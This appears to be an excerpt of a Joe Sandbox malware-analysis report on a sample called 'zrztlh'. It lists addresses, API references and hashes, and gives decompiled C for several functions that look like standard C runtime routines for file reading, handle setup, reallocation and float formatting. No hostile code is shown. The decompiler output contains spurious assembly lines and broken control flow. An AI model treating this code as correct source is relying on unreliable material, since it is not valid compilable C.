                0x00eb724b
                0x00eb7250
                0x00eb7255
                0x00eb725b
                0x00eb7264
                0x00eb7269
                0x00eb726e
                0x00eb7276
                0x00eb7277
                0x00eb7278
                0x00eb7279
                0x00eb727a
                0x00eb727b
                0x00eb7280
                0x00eb7284
                0x00eb74b4
                0x00eb74b5
                0x00eb74bd
                0x00eb74c4
                0x00eb74c7
                0x00eb74cb
                0x00eb74d1
                0x00eb74fc
                0x00eb7502
                0x00eb750c
                0x00eb7515
                0x00eb7270
                0x00eb7270
                0x00000000
                0x00eb7270
                0x00eb7257
                0x00eb7257
                0x00000000
                0x00eb7257
                0x00eb723e
                0x00eb723e
                0x00eb7258
                0x00eb725a
                0x00eb725a
                0x00eb7226
                0x00eb7229
                0x00eb7229

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: 32616be13f85c62341beb63ec7adddd1844143b756ccbdc31340d0c320fed0ec
                • Instruction ID: 622e5a34df4c7055181c6a58499c0bb5ece341e994d90cad7854b7bdbad77b6c
                • Opcode Fuzzy Hash: 32616be13f85c62341beb63ec7adddd1844143b756ccbdc31340d0c320fed0ec
                • Instruction Fuzzy Hash: 76212B7120C208AEEB109A649C46FFB33ECDBC5764F505565F948F6990FA61EE008690
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA622B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87fileCOMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E00EA622B(signed int __ebx, signed int __edx, intOrPtr* __edi, signed int __esi) {
				intOrPtr _t83;
				signed char _t84;
				intOrPtr _t86;
				signed int _t87;
				signed char _t89;
				signed int _t90;
				signed int _t92;
				long _t100;
				signed int _t105;
				char _t106;
				char _t107;
				signed int _t109;
				char* _t113;
				void* _t114;
				void* _t117;
				void* _t118;
				void* _t119;
				signed int _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t126;
				intOrPtr _t127;
				intOrPtr _t129;
				signed int _t136;
				signed int _t138;
				intOrPtr* _t140;
				signed int _t142;
				char* _t144;
				signed int _t145;
				signed char* _t147;
				int _t148;
				signed int _t149;
				void* _t150;
				void* _t152;
				void* _t165;

				_t145 = __esi;
				_t140 = __edi;
				_t136 = __edx;
				_t122 = __ebx;
				while(1) {
					L12:
					_t140 = _t140 + 1;
					if(ReadFile( *( *((intOrPtr*)(0xecf230 + _t136 * 4)) + _t122), _t150 - 1, 1, _t150 - 0x14, 0) != 0 || GetLastError() == 0) {
						goto L14;
					}
					L29:
					_t136 =  *(_t150 - 0xc);
					_t126 = 0xd;
					 *_t145 = _t126;
					_t145 = _t145 + 1;
					L24:
					while(_t140 <  *((intOrPtr*)(_t150 - 0x1c))) {
						_t83 =  *_t140;
						__eflags = _t83 - 0x1a;
						if(_t83 == 0x1a) {
							_t127 =  *((intOrPtr*)(0xecf230 + _t136 * 4));
							_t84 =  *(_t127 + _t122 + 4);
							__eflags = _t84 & 0x00000040;
							if((_t84 & 0x00000040) != 0) {
								 *_t145 =  *_t140;
								_t145 = _t145 + 1;
								__eflags = _t145;
							} else {
								 *(_t127 + _t122 + 4) = _t84 | 0x00000002;
							}
						} else {
							__eflags = _t83 - _t126;
							if(_t83 == _t126) {
								__eflags = _t140 -  *((intOrPtr*)(_t150 - 0x1c)) - 1;
								if(_t140 >=  *((intOrPtr*)(_t150 - 0x1c)) - 1) {
									goto L12;
								} else {
									_t113 = _t140 + 1;
									__eflags =  *_t113 - 0xa;
									if( *_t113 != 0xa) {
										 *_t145 = _t126;
										_t140 = _t113;
										_t145 = _t145 + 1;
									} else {
										_t114 = 0xa;
										_t140 = _t140 + 2;
										 *_t145 = _t114;
										L28:
										_t145 = _t145 + 1;
									}
								}
							} else {
								 *_t145 = _t83;
								_t145 = _t145 + 1;
								_t140 = _t140 + 1;
							}
							continue;
						}
						L33:
						_t38 = _t150 - 0x10; // 0xeb2b47
						_t86 =  *_t38;
						_t142 = _t145 - _t86;
						if( *((char*)(_t150 + 0x13)) != 1 || _t142 == 0) {
							L58:
							_t123 =  *(_t150 - 0x18);
						} else {
							_t147 = _t145 - 1;
							_t89 =  *_t147;
							if(_t89 < 0) {
								_t90 = _t89 & 0x000000ff;
								_t138 = 1;
								__eflags =  *((char*)(_t90 + 0xece408));
								if( *((char*)(_t90 + 0xece408)) == 0) {
									_t41 = _t150 - 0x10; // 0xeb2b47
									_t125 =  *_t41;
									while(1) {
										__eflags = _t138 - 4;
										if(_t138 > 4) {
											break;
										}
										__eflags = _t147 - _t125;
										if(_t147 >= _t125) {
											_t147 = _t147 - 1;
											_t138 = _t138 + 1;
											_t109 =  *_t147 & 0x000000ff;
											__eflags =  *((char*)(_t109 + 0xece408));
											if( *((char*)(_t109 + 0xece408)) == 0) {
												continue;
											}
										}
										break;
									}
									_t122 =  *(_t150 - 0x24);
								}
								_t92 =  *((char*)(( *_t147 & 0x000000ff) + 0xece408));
								__eflags = _t92;
								if(_t92 != 0) {
									__eflags = _t92 + 1 - _t138;
									if(_t92 + 1 != _t138) {
										_t129 =  *((intOrPtr*)(0xecf230 +  *(_t150 - 0xc) * 4));
										__eflags =  *(_t129 + _t122 + 4) & 0x00000048;
										if(__eflags == 0) {
											asm("cdq");
											E00EB3F56(_t129, __eflags,  *((intOrPtr*)(_t150 + 8)),  ~_t138,  ~_t138, 1);
											_t152 = _t152 + 0x10;
										} else {
											_t149 =  &(_t147[1]);
											 *((char*)(_t129 + _t122 + 5)) =  *_t147;
											_t105 =  *(_t150 - 0xc);
											__eflags = _t138 - 2;
											if(_t138 >= 2) {
												_t107 =  *_t149;
												_t149 = _t149 + 1;
												__eflags = _t149;
												 *((char*)( *((intOrPtr*)(0xecf230 + _t105 * 4)) + _t122 + 0x25)) = _t107;
												_t105 =  *(_t150 - 0xc);
											}
											__eflags = _t138 - 3;
											if(_t138 == 3) {
												_t106 =  *_t149;
												_t149 = _t149 + 1;
												__eflags = _t149;
												 *((char*)( *((intOrPtr*)(0xecf230 + _t105 * 4)) + _t122 + 0x26)) = _t106;
											}
											_t147 = _t149 - _t138;
										}
									} else {
										_t147 =  &(_t147[_t138]);
									}
									goto L54;
								} else {
									 *((intOrPtr*)(E00EAF100())) = 0x2a;
									goto L3;
								}
							} else {
								_t147 =  &(_t147[1]);
								L54:
								_t66 = _t150 - 0x10; // 0xeb2b47
								_t144 =  *_t66;
								_t148 = _t147 - _t144;
								_t142 = MultiByteToWideChar(0xfde9, 0, _t144, _t148,  *(_t150 + 0xc),  *(_t150 - 0x28) >> 1);
								if(_t142 == 0) {
									_t100 = GetLastError();
									E00EAF0DF(_t100);
									L3:
									_t123 = _t122 | 0xffffffff;
									__eflags = _t123;
									_t1 = _t150 - 0x10; // 0xeb2b47
									_t86 =  *_t1;
								} else {
									_t165 = _t142 - _t148;
									_t142 = _t142 + _t142;
									 *( *((intOrPtr*)(0xecf230 +  *(_t150 - 0xc) * 4)) + _t122 + 0x30) = 0 | _t165 != 0x00000000;
									asm("sbb [eax], dh");
									_t75 = _t150 - 0x10; // 0xeb2b47
									_t86 =  *_t75;
									goto L58;
								}
							}
						}
						L59:
						if(_t86 !=  *(_t150 + 0xc)) {
							E00EB2248(_t86);
						}
						if(_t123 != 0xfffffffe) {
							_t142 = _t123;
						}
						_t87 = _t142;
						return _t87;
					}
					goto L33;
					L14:
					if( *(_t150 - 0x14) == 0) {
						goto L29;
					} else {
						_t136 =  *(_t150 - 0xc);
						if(( *( *((intOrPtr*)(0xecf230 + _t136 * 4)) + _t122 + 4) & 0x00000048) == 0) {
							_t23 = _t150 - 0x10; // 0xeb2b47
							__eflags = _t145 -  *_t23;
							if(__eflags != 0) {
								L26:
								E00EB3F56(_t126, __eflags,  *((intOrPtr*)(_t150 + 8)), 0xffffffff, 0xffffffff, 1);
								_t136 =  *(_t150 - 0xc);
								_t152 = _t152 + 0x10;
								_t117 = 0xa;
								__eflags =  *(_t150 - 1) - _t117;
								if( *(_t150 - 1) == _t117) {
									goto L22;
								} else {
									_t126 = 0xd;
									 *_t145 = _t126;
									goto L28;
								}
								goto L59;
							} else {
								_t118 = 0xa;
								__eflags =  *(_t150 - 1) - _t118;
								if(__eflags != 0) {
									goto L26;
								} else {
									 *_t145 = _t118;
									_t145 = _t145 + 1;
									__eflags = _t145;
									L22:
									_push(0xd);
									goto L23;
								}
							}
						} else {
							_t119 = 0xa;
							_push(0xd);
							if( *(_t150 - 1) != _t119) {
								 *_t145 = 0xd;
								_t145 = _t145 + 1;
								 *((char*)( *((intOrPtr*)(0xecf230 + _t136 * 4)) + _t122 + 5)) =  *(_t150 - 1);
							} else {
								 *_t145 = _t119;
								_t145 = _t145 + 1;
							}
							L23:
							_pop(_t126);
						}
					}
					goto L24;
				}
			}






































                0x00ea622b
                0x00ea622b
                0x00ea622b
                0x00ea622b
                0x00eafb65
                0x00eafb65
                0x00eafb6a
                0x00eafb84
                0x00000000
                0x00000000
                0x00eafc0c
                0x00eafc0c
                0x00eafc11
                0x00eafc12
                0x00eafc14
                0x00000000
                0x00eafbdd
                0x00eafb2a
                0x00eafb2c
                0x00eafb2e
                0x00eafc17
                0x00eafc1e
                0x00eafc22
                0x00eafc24
                0x00eafc30
                0x00eafc32
                0x00eafc32
                0x00eafc26
                0x00eafc28
                0x00eafc28
                0x00eafb34
                0x00eafb34
                0x00eafb36
                0x00eafb45
                0x00eafb47
                0x00000000
                0x00eafb49
                0x00eafb49
                0x00eafb4c
                0x00eafb4f
                0x00eafb5e
                0x00eafb60
                0x00eafb62
                0x00eafb51
                0x00eafb53
                0x00eafb54
                0x00eafb57
                0x00eafc09
                0x00eafc09
                0x00eafc09
                0x00eafb4f
                0x00eafb38
                0x00eafb38
                0x00eafb3a
                0x00eafb3b
                0x00eafb3b
                0x00000000
                0x00eafb36
                0x00eafc33
                0x00eafc33
                0x00eafc33
                0x00eafc38
                0x00eafc3e
                0x00eafd49
                0x00eafd49
                0x00eafc4c
                0x00eafc4c
                0x00eafc4d
                0x00eafc51
                0x00eafc59
                0x00eafc5e
                0x00eafc5f
                0x00eafc66
                0x00eafc68
                0x00eafc68
                0x00eafc6b
                0x00eafc6b
                0x00eafc6e
                0x00000000
                0x00000000
                0x00eafc70
                0x00eafc72
                0x00eafc74
                0x00eafc75
                0x00eafc76
                0x00eafc79
                0x00eafc80
                0x00000000
                0x00000000
                0x00eafc80
                0x00000000
                0x00eafc72
                0x00eafc82
                0x00eafc82
                0x00eafc88
                0x00eafc8f
                0x00eafc91
                0x00eafca4
                0x00eafca6
                0x00eafcaf
                0x00eafcb6
                0x00eafcbb
                0x00eafcfa
                0x00eafd00
                0x00eafd05
                0x00eafcbd
                0x00eafcbf
                0x00eafcc0
                0x00eafcc4
                0x00eafcc7
                0x00eafcca
                0x00eafcd3
                0x00eafcd5
                0x00eafcd5
                0x00eafcd6
                0x00eafcda
                0x00eafcda
                0x00eafcdd
                0x00eafce0
                0x00eafce9
                0x00eafceb
                0x00eafceb
                0x00eafcec
                0x00eafcec
                0x00eafcf0
                0x00eafcf0
                0x00eafca8
                0x00eafca8
                0x00eafca8
                0x00000000
                0x00eafc93
                0x00eafc98
                0x00000000
                0x00eafc98
                0x00eafc53
                0x00eafc53
                0x00eafd08
                0x00eafd0b
                0x00eafd0b
                0x00eafd0e
                0x00eafd25
                0x00eafd29
                0x00eafa7c
                0x00eafa83
                0x00eafa89
                0x00eafa89
                0x00eafa89
                0x00eafa8c
                0x00eafa8c
                0x00eafd2f
                0x00eafd34
                0x00eafd39
                0x00eafd42
                0x00eafd44
                0x00eafd46
                0x00eafd46
                0x00000000
                0x00eafd46
                0x00eafd29
                0x00eafc51
                0x00eafd4c
                0x00eafd4f
                0x00eafd52
                0x00eafd57
                0x00eafd5b
                0x00eafd5d
                0x00eafd5d
                0x00eafd5f
                0x00eaffda
                0x00eaffda
                0x00000000
                0x00eafb90
                0x00eafb94
                0x00000000
                0x00eafb96
                0x00eafb96
                0x00eafba5
                0x00eafbca
                0x00eafbca
                0x00eafbcd
                0x00eafbe8
                0x00eafbf1
                0x00eafbf6
                0x00eafbf9
                0x00eafbfe
                0x00eafbff
                0x00eafc02
                0x00000000
                0x00eafc04
                0x00eafc06
                0x00eafc07
                0x00000000
                0x00eafc07
                0x00000000
                0x00eafbcf
                0x00eafbd1
                0x00eafbd2
                0x00eafbd5
                0x00000000
                0x00eafbd7
                0x00eafbd7
                0x00eafbd9
                0x00eafbd9
                0x00eafbda
                0x00eafbda
                0x00000000
                0x00eafbda
                0x00eafbd5
                0x00eafba7
                0x00eafba9
                0x00eafbaa
                0x00eafbaf
                0x00eafbb6
                0x00eafbb9
                0x00eafbc4
                0x00eafbb1
                0x00eafbb1
                0x00eafbb3
                0x00eafbb3
                0x00eafbdc
                0x00eafbdc
                0x00eafbdc
                0x00eafba5
                0x00000000
                0x00eafb94

                APIs
                • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47), ref: 00EAFB7C
                • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47,?,00000080,00000003), ref: 00EAFB86
                • __lseeki64_nolock.LIBCMT ref: 00EAFBF1
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,G+,G+,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00EAFD1F
                • _free.LIBCMT ref: 00EAFD52
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ByteCharErrorFileLastMultiReadWide__lseeki64_nolock_free
                • String ID: G+
                • API String ID: 1844164652-804368800
                • Opcode ID: 21390e061c66065c7d4ee5e22fad37ea63a50d7a5f92c400cc64ffeda891c4a3
                • Instruction ID: 7392e6b12f26c4e0a492a304c54e8623a1ec96900f0ca7c4519a7a573e700583
                • Opcode Fuzzy Hash: 21390e061c66065c7d4ee5e22fad37ea63a50d7a5f92c400cc64ffeda891c4a3
                • Instruction Fuzzy Hash: D221F535A002059FDB11CFE9D884FAEB7B5AF4A714F145075E955FF290CA31A8468B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA600E Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                Download Yara Rule
                C-Code - Quality: 81%
                			E00EA600E(void* __edx, void* __edi, void* __esi) {
				long _t33;
				signed int _t40;
				signed int _t43;
				signed char _t45;
				void* _t47;
				signed int _t52;
				void* _t54;
				signed int _t56;
				void* _t57;
				void* _t60;
				signed int _t61;
				void* _t62;

				_t60 = __esi;
				_t57 = __edi;
				_t54 = __edx;
				asm("in al, 0x0");
				_t45 = 0;
				if(( *(_t62 + 0xc) & 0x00000008) != 0) {
					_t45 = 0x20;
				}
				if(( *(_t62 + 0xc) & 0x00004000) != 0) {
					_t45 = _t45 | 0x00000080;
				}
				if(( *(_t62 + 0xc) & 0x00000080) != 0) {
					_t45 = _t45 | 0x00000010;
				}
				_t33 = GetFileType( *(_t62 + 8));
				if(_t33 != 0) {
					__eflags = _t33 - 2;
					if(__eflags != 0) {
						__eflags = _t33 - 3;
						if(__eflags == 0) {
							_t45 = _t45 | 0x00000008;
							__eflags = _t45;
						}
					} else {
						_t45 = _t45 | 0x00000040;
					}
					_t61 = E00EB3A06(_t45, _t47, _t54, _t57, _t60, __eflags);
					 *(_t62 + 0xc) = _t61;
					__eflags = _t61 - 0xffffffff;
					if(_t61 != 0xffffffff) {
						 *(_t62 - 4) =  *(_t62 - 4) & 0x00000000;
						E00EB3DB2(_t61,  *(_t62 + 8));
						_t56 = _t61 >> 5;
						_t52 = (_t61 & 0x0000001f) << 6;
						 *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 4) = _t45 | 0x00000001;
						 *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) =  *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) & 0x00000080;
						 *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) =  *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) & 0x0000007f;
						 *((intOrPtr*)(_t62 - 0x1c)) = 1;
						 *(_t62 - 4) = 0xfffffffe;
						E00EB3D8D(1, _t61);
						__eflags = 1;
						if(1 == 0) {
							_t61 = _t61 | 0xffffffff;
							__eflags = _t61;
						}
						_t40 = _t61;
					} else {
						 *((intOrPtr*)(E00EAF100())) = 0x18;
						_t43 = E00EAF0CC();
						 *_t43 =  *_t43 & 0x00000000;
						goto L9;
					}
				} else {
					_t43 = E00EAF0DF(GetLastError());
					L9:
					_t40 = _t43 | 0xffffffff;
				}
				return E00EAF225(_t40);
			}















                0x00ea600e
                0x00ea600e
                0x00ea600e
                0x00eb3caa
                0x00eb3cac
                0x00eb3cb2
                0x00eb3cb4
                0x00eb3cb4
                0x00eb3cbe
                0x00eb3cc0
                0x00eb3cc0
                0x00eb3cc7
                0x00eb3cc9
                0x00eb3cc9
                0x00eb3ccf
                0x00eb3cd7
                0x00eb3cee
                0x00eb3cf1
                0x00eb3cf8
                0x00eb3cfb
                0x00eb3cfd
                0x00eb3cfd
                0x00eb3cfd
                0x00eb3cf3
                0x00eb3cf3
                0x00eb3cf3
                0x00eb3d05
                0x00eb3d07
                0x00eb3d0a
                0x00eb3d0d
                0x00eb3d24
                0x00eb3d2c
                0x00eb3d38
                0x00eb3d40
                0x00eb3d4a
                0x00eb3d55
                0x00eb3d61
                0x00eb3d69
                0x00eb3d6c
                0x00eb3d73
                0x00eb3d78
                0x00eb3d7a
                0x00eb3d7c
                0x00eb3d7c
                0x00eb3d7c
                0x00eb3d7f
                0x00eb3d0f
                0x00eb3d14
                0x00eb3d1a
                0x00eb3d1f
                0x00000000
                0x00eb3d1f
                0x00eb3cd9
                0x00eb3ce0
                0x00eb3ce6
                0x00eb3ce6
                0x00eb3ce6
                0x00eb3d86

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                • String ID:
                • API String ID: 43408053-0
                • Opcode ID: 848f810a2aa95084b9e8040f56c7cc9ff3325a041b0ff3dad74caf40290ba2d4
                • Instruction ID: 5672838568ea7ded5549dae1e5e3344575c7a96a7a6ffa5ebd023d4cb67f6592
                • Opcode Fuzzy Hash: 848f810a2aa95084b9e8040f56c7cc9ff3325a041b0ff3dad74caf40290ba2d4
                • Instruction Fuzzy Hash: C6213E315065015ECB219B79DC077DABF905F01338F28A719E8A07B2E3CB3597069F50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EB6902 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 95%
                			E00EB6902(void* __ebx, void* __ecx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t32;

				if(_a4 != 0) {
					_t32 = _a8;
					if(_t32 != 0) {
						_push(__ebx);
						while(_t32 <= 0xffffffe0) {
							if(_t32 == 0) {
								_t32 = _t32 + 1;
							}
							_t7 = HeapReAlloc( *0xecf22c, 0, _a4, _t32);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0xed0060 == _t7) {
									_t9 = E00EAF100();
									 *_t9 = E00EAF159(GetLastError());
									goto L17;
								} else {
									if(E00EB4C7E(_t7, _t32) == 0) {
										_t12 = E00EAF100();
										 *_t12 = E00EAF159(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00EB4C7E(_t6, _t32);
						 *((intOrPtr*)(E00EAF100())) = 0xc;
						goto L12;
					} else {
						E00EB2248(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00EB6870(__ebx, __ecx, __edx, __edi, _a8);
				}
			}









                0x00eb6909
                0x00eb6917
                0x00eb691c
                0x00eb692b
                0x00eb695e
                0x00eb6930
                0x00eb6932
                0x00eb6932
                0x00eb693f
                0x00eb6945
                0x00eb6949
                0x00eb69a9
                0x00eb69a9
                0x00eb694b
                0x00eb6951
                0x00eb6993
                0x00eb69a7
                0x00000000
                0x00eb6953
                0x00eb695c
                0x00eb697b
                0x00eb698f
                0x00eb6975
                0x00eb6975
                0x00000000
                0x00000000
                0x00000000
                0x00eb695c
                0x00eb6951
                0x00000000
                0x00eb6977
                0x00eb6964
                0x00eb696f
                0x00000000
                0x00eb691e
                0x00eb6921
                0x00eb6927
                0x00eb6927
                0x00eb6978
                0x00eb697a
                0x00eb690b
                0x00eb6915
                0x00eb6915

                APIs
                • _malloc.LIBCMT ref: 00EB690E
                  • Part of subcall function 00EB6870: __FF_MSGBANNER.LIBCMT ref: 00EB6887
                  • Part of subcall function 00EB6870: __NMSG_WRITE.LIBCMT ref: 00EB688E
                  • Part of subcall function 00EB6870: RtlAllocateHeap.NTDLL(008F0000,00000000,00000001,00000000,00000000,00000000,?,00EB22DE,00000000,00000000,00000000,00000000,?,00EB2193,00000018,00ECC228), ref: 00EB68B3
                • _free.LIBCMT ref: 00EB6921
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: AllocateHeap_free_malloc
                • String ID:
                • API String ID: 1020059152-0
                • Opcode ID: b9308b57d57c78fb18ec6cf5c098717c595fc83990a99a0ee6aa0dc77a91db29
                • Instruction ID: bb3493447c2ffea952990fc9110f13710d528ae5e3e5da6c679e0dda08395ac7
                • Opcode Fuzzy Hash: b9308b57d57c78fb18ec6cf5c098717c595fc83990a99a0ee6aa0dc77a91db29
                • Instruction Fuzzy Hash: DE110A32405215EFCB212FB0FC057EB3BD4AF553A4F206539FA45FE161DB3988408691
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EC2241 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00EC2241(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00EC27B0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00EC22E5(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00EC2A64(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00EC2985(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                0x00ec2244
                0x00ec224a
                0x00ec22bd
                0x00000000
                0x00ec2251
                0x00ec2251
                0x00ec2254
                0x00ec226f
                0x00ec2272
                0x00ec2292
                0x00ec22a4
                0x00ec2274
                0x00ec2274
                0x00ec2277
                0x00000000
                0x00ec2279
                0x00ec228b
                0x00ec228b
                0x00ec2277
                0x00ec22c2
                0x00ec22c6
                0x00ec2256
                0x00ec226e
                0x00ec226e
                0x00ec2254

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: 292b7bd2d9c99b2bb16a839906547967230dbf570db0668fca305cc88826b2c5
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: A4014B3200014ABBCF1A5E84DD41EEE3F62BF29358B58951DFB1868035D637C9B2AB81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA6BF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                Download Yara Rule
                C-Code - Quality: 97%
                			E00EA6BF2(signed short* __ecx, void* __edx, signed char __esi, void* __eflags) {
				intOrPtr _t14;
				signed int _t15;
				signed int _t17;
				intOrPtr _t19;
				void* _t21;
				void* _t22;
				signed int _t23;
				signed short* _t25;
				void* _t27;
				signed int _t30;
				void* _t32;
				signed char _t33;
				void* _t35;

				_t33 = __esi;
				_t27 = __edx;
				_t25 = __ecx;
				asm("cli");
				if(__eflags < 0) {
					 *((intOrPtr*)(_t35 + 0x10)) = 0x1a;
					_t32 = 0xd;
					while(1) {
						_t17 =  *_t25 & 0x0000ffff;
						if(_t17 ==  *((intOrPtr*)(_t35 + 0x10))) {
							break;
						}
						if(_t17 == _t32) {
							__eflags = _t25 - _t27 - 2;
							if(_t25 < _t27 - 2) {
								_t25 =  &(_t25[1]);
								_t21 = 0xa;
								__eflags =  *_t25 - _t21;
								if( *_t25 != _t21) {
									_t21 = 0xd;
									_t32 = _t21;
								}
								 *_t33 = _t21;
								_t33 = _t33 + 2;
								__eflags = _t33;
							}
						} else {
							 *_t33 = _t17;
							_t33 = _t33 + 2;
							_t25 =  &(_t25[1]);
						}
						if(_t25 < _t27) {
							continue;
						} else {
						}
						goto L19;
					}
					_t19 =  *((intOrPtr*)(0xecf230 +  *(_t35 - 0xc) * 4));
					_t9 = _t19 + _t22 + 4;
					 *_t9 =  *(_t19 + _t22 + 4) | 0x00000002;
					__eflags =  *_t9;
				}
				L19:
				_t13 = _t35 - 0x10; // 0xeb2b47
				_t14 =  *_t13;
				_t30 = _t33 - _t14 & 0xfffffffe;
				_t23 =  *(_t35 - 0x18);
				if(_t14 !=  *((intOrPtr*)(_t35 + 0xc))) {
					E00EB2248(_t14);
				}
				if(_t23 != 0xfffffffe) {
					_t30 = _t23;
				}
				_t15 = _t30;
				return _t15;
			}
















                0x00ea6bf2
                0x00ea6bf2
                0x00ea6bf2
                0x00eafd7e
                0x00eafd7f
                0x00eafd83
                0x00eafd8a
                0x00eafd8b
                0x00eafd8b
                0x00eafd92
                0x00000000
                0x00000000
                0x00eafd97
                0x00eafda7
                0x00eafda9
                0x00eafdab
                0x00eafdb0
                0x00eafdb1
                0x00eafdb4
                0x00eafdb8
                0x00eafdba
                0x00eafdba
                0x00eafdbb
                0x00eafdbe
                0x00eafdbe
                0x00eafdbe
                0x00eafd99
                0x00eafd99
                0x00eafd9c
                0x00eafd9f
                0x00eafd9f
                0x00eafdc3
                0x00000000
                0x00000000
                0x00eafdc5
                0x00000000
